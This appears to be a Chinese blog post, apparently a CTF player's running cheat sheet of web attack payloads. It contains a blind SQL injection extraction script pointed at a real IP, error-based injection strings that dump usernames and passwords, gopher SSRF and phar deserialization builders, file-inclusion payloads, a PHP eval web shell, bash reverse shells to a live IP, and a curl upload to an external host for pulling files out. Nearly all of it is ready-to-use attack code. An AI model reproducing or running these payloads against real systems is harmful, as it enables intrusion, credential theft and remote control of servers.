常用payload总结(更新中):
bool盲注,post类型
"""你爱过一个女孩吗?你体验过那种感觉吗?"""import requestsurl="http://159.75.116.195:8086/login.php"flag=''for i in range(1,500):min = 32max = 127while min<max:mid=(min+max)//2# payload=f"or(ascii(substr(version(),{i},1))>{mid})#"#payload=f'or(ascii(substr(secret,{i},1))>{mid})#'#payload=f'or(if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},1,0))#'# payload=f"or((if(ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(!(table_schema<>'test'))),{i},1))>{mid},1,0)))#"# payload=f"or((if(ascii(mid((SELECT(group_concat(column_name))from(information_schema.columns)where(!(table_name<>'0xgame_secret'))),{i},1))>{mid},1,0)))#"payload=f"or((if(ascii(mid((select(group_concat(secret))from(test.0xgame_secret)),{i},1))>{mid},1,0)))#"#payload=f"or(ascii(substr(version(),{i},1))>{mid})#"headers={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0','Content-Type':'application/x-www-form-urlencoded'}data={'username':'\\','password':payload}response=requests.post(url=url,data=data)if 'l0v3' in response.text:min =mid+1else:max=midif min !=32 :flag+=chr(min)else:breakprint(flag)
SSRF gopher协议
转化脚本
import urllib.parsepayload =\"""POST /read.php HTTP/1.1Host: 127.1:80Content-Length: 50Content-Type: application/x-www-form-urlencodedname=%25%32%66%25%36%36%25%36%63%25%36%31%25%36%37"""tmp = urllib.parse.quote(payload)new = tmp.replace('%0A','%0D%0A')result = 'gopher://127.1:80/'+'_'+newresult = urllib.parse.quote(result)print(result)
GraphQL
https://book.hacktricks.xyz/pentesting/pentesting-web/graphql
https://threst.github.io/2018/05/22/你肯定不知道的GraphQL安全概述和测试技巧/
{“query”:”{__schema{types{name,fields{name, args{name,description,type{name, kind, ofType{name, kind}}}}}}}”}
查看所有表和列
{“query”:”{user(id: 1){username,privateEmail}}”}
查数据
phar反序列化
@unlink('yuan.phar');$phar = new Phar("yuan.phar"); //文件名,后缀名必须为phar$phar->startBuffering();$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub$phar->setMetadata($s); //传$c 将自定义的meta-data存入manifest$phar->addFromString("test.txt", "test"); //添加要压缩的文件。这里的内容不影响题目$phar->stopBuffering(); //签名自动计算
字典密码生成
生成如000-999的序列
start = int(input("请输入开始的数值:"))end = int(input("请输入结束的数值:"))num = int(input("请输入生成的位数:"))path = str(start)+"到"+str(end)+"的"+str(num)+"位数字典.txt"#输出的字典名for i in range(start,end+1): # 生成从start到end的字典s = str(i).zfill(num) #生成六位数的字典with open(path,"a") as f: #打开文件f.write(str(s) + "\n") #写入文件f.close()
linux查找文件字符串
grep -r 0xGame /tmp
MariaDB/Mysql
无information_schema注入
SELECT object_name FROM performance_schema.objects_summary_global_by_type WHERE object_schema = DATABASE();
参考文章:(国外大牛)
小权限下载目标服务器上文件
解决办法先上传后下载
curl bashupload.com -T your_file.txt
伪造请求头
import base64import requestspayload={"X1cT34m":"1","Pupi1":"1"}head={"User-Agent": "N1k0la浏览器".encode('utf-8'),"x-forwarded-for": "127.0.0.1"}url='http://159.75.116.195:700/?0xGame2021=welcome to the 0xGame2021'r=requests.post(url=url,headers=head,data=payload)print(r.text)a='JGE9JF9HRVRbJzB4R2FtZTIwMjEnXTskYj0kX1BPU1RbJ1gxY1QzNG0nXTskZD0kX1BPU1RbJ1B1cGkxJ107JGM9J3dlbGNvbWUgdG8gdGhlIDB4R2FtZTIwMjEnO2lmKG1kNSgkYik9PW1kNSgkZCkmJiRhPT09JGMpe2VjaG8gJGZsYWc7fQ=='a=base64.b64decode(a)print(a)
人工智能识别解密
ciphey
apt直接下载
python -m ciphey -t “密文”
base破解:basecrack
python basecrack.py
反弹shell
在服务器上开启监听:nc -lvvnp 8888
bash -i >& /dev/tcp/116.62.127.33/8888 <&2
bash -i >& /dev/tcp/116.62.127.33/8888 0>&1
二次反弹
连接之后发现命令无回显,可以弹到服务器上其他端口,新开终端监听,在原来终端反弹
flask session 伪造 要有密钥
python3 flask_session_cookie_manager3.py encode -s 'x1ct34myydsytstflglgjhdfhsh' -t '{"name":"admin","uid":"1"}'
php短标签(要设置)
<?@eval($_POST['a']);?>
md5爆破脚本
import stringimport hashlibpayload = string.ascii_letters + string.digitsdef calc_md5(s):md5 = hashlib.md5(s.encode("utf-8")).hexdigest()md5_double = hashlib.md5(md5.encode("utf-8")).hexdigest()if (md5_double[0:2] == "0e" and md5_double[2:].isdigit()):print(s)def getstr(payload, s, slen):if (len(s) == slen):calc_md5(s)return sfor i in payload:sl = s + igetstr(payload, sl, slen)# 字符串长度从0到30,肯定找得到for i in range(3, 30):getstr(payload, '', i)
python 正则应用
import requestsimport res=requests.Session()url = 'https://756-9d36cee9-e231-4196-86c6-49294073e191.do-not-trust.hacking.run/'# header = {"x-forwarded-for": "127.0.0.1"}r1 = s.get(url=url)link_list = (re.findall(r".*</p>", r1.text)[0])[0:-4]result = eval(link_list)payload = {'result': result}r2 = s.post(url=url, data=payload)print(r2.text)
文件包含
/index2.php?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2bindex.php?file=php://filter/convert.base64-encode/resource=index.php
php://input
报错注入
payload:
- 使用()代替空格
- 使用like代替=
- 使用right、left代替substring、mid ```sql 1’or(1)like(2)%23
1’or(updatexml(‘~’,concat(‘~’,database(),’~’),’~’))%23
1’or(updatexml(‘~’,concat(‘~’,(select(left(group_concat(schema_name),30))from(information_schema.schemata)),’~’),’~’))%23
1’or(updatexml(‘~’,concat(‘~’,(select(right(group_concat(schema_name),30))from(information_schema.schemata)),’~’),’~’))%23
1’or(updatexml(‘~’,concat(‘~’,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like’geek’),’~’),’~’))%23
1’or(updatexml(‘~’,concat(‘~’,(select(group_concat(id,’~’,username,’~’,password))from(geek.H4rDsq1)),’~’),’~’))%23
1’or(updatexml(‘~’,concat(‘~’,(select(right(group_concat(id,’~’,username,’~’,password),30))from(geek.H4rDsq1)),’~’),’~’))%23 ```
若有收获,就点个赞吧
0 人点赞
